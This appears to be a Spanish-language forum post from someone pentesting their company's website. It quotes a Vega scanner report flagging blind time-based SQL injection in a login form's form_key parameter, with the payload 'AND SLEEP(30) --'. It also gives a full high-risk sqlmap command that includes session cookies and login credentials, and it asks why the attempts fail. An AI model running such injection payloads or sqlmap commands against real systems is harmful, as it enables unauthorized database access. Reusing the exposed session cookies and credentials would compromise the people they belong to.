He estado probando con lápiz nuestro sitio web y Vega me indicó una inyección de SQL en nuestro formulario de inicio de sesión. Intenté usar burpsuite y sql map para probar la inyección. Aunque no he llegado a ninguna parte.
Esto es lo que dice vega.
SQL Injection
Classification
Input Validation Error
Resource
https://connect.website.com/customer/account/https:/connect.website.com/customer/account/loginPost
Parameter
form_key
Method
POST
Detection Type
Blind Timing Analysis Checks
Risk
High
REQUEST
POST /customer/account/https:/connect.website.com/customer/account/loginPost/ [form_key=1 AND SLEEP(30) -- login[username]=Joey login[password]=vega send=1 ]
Aquí está el comando sqlmap que estoy usando desde burpsuite con el complemento incorporado en sqlmap.
sqlmap.py -u "https://connect.website.com:443/customer/account/loginPost/referer/aHR0cHM6Ly9jb25uZWN0LmNhcmxzdGFyZ3JvdXAuY29tL2N1c3RvbWVyL2FjY291bnQvaW5kZXgv/"
--data="form_key=7Nuz4k1gNhKeA8TI&login%5Busername%5D=i%40ia.com&login%5Bpassword%5D=Man012&send=1"
--method="PUT"
--cookie="__utma=127784223.1809202726.1518887522.1518887522.1518928782.2; __utmc=127784223; __utmz=127784223.1518887522.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); frontend=6t1etlnb7l1ts01hkdt5dgafu5; frontend_cid=TnFuGP6n3JvalznN; __utmb=127784223.3.10.1518928782; __utmt=1"
--user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
--referer="https://connect.website.com/customer/account/login/referer/aHR0cHM6Ly9jb25uZWN0LmNhcmxzdGFyZ3JvdXAuY29tL2N1c3RvbWVyL2FjY291bnQvaW5kZXgv/"
--delay=0 --timeout=30 --retries=0 --dbms="MySQL"
--os=Linux --level=3 --risk=3 --threads=1 --time-sec=15
-b --batch --answers="crack=N,dict=N"
Solo una actualización, repito la exploración de Vega y encontré más inyecciones de SQL pero en realidad en una página diferente. Mismo tipo de análisis de tiempo ciego. Parece no ser realmente vulnerable en base a mis pruebas con burpsuite pero esto está un poco por encima de mi cabeza.